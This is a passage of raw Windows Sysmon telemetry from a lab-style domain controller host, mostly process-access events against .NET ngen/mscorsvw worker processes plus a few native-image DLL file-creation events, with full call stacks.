13:26:56.514{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-B804-000000009A01}4316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.498{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-B804-000000009A01}4316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.498{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-B804-000000009A01}4316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:56.436{08A6967A-46A0-6000-B704-000000009A01}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e4-0\System.Web.DynamicData.Design.dll2021-01-14 13:26:56.436 10341000x80000000000000008854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.357{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-B704-000000009A01}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.342{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-B704-000000009A01}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.342{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-B704-000000009A01}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-B604-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.264{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46A0-6000-B604-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.264{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A0-6000-B604-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:56.186{08A6967A-469F-6000-B504-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13cc-0\System.Web.DynamicData.dll2021-01-14 13:26:56.186 10341000x80000000000000008878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A1-6000-BE04-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.561{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A1-6000-BE04-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.561{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A1-6000-BE04-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.404{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A1-6000-BD04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.389{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46A1-6000-BD04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.389{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A1-6000-BD04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.295{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A1-6000-BC04-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.279{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46A1-6000-BC04-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:57.279{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A1-6000-BC04-000000009A01}4220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:57.201{08A6967A-46A0-6000-BB04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e4-0\System.Web.Entity.Design.dll2021-01-14 13:26:57.201 10341000x80000000000000008868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:56.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A0-6000-BB04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A2-6000-C004-000000009A01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.201{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46A2-6000-C004-000000009A01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.201{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46A2-6000-C004-000000009A01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:58.108{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46A2-6000-BF04-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Syst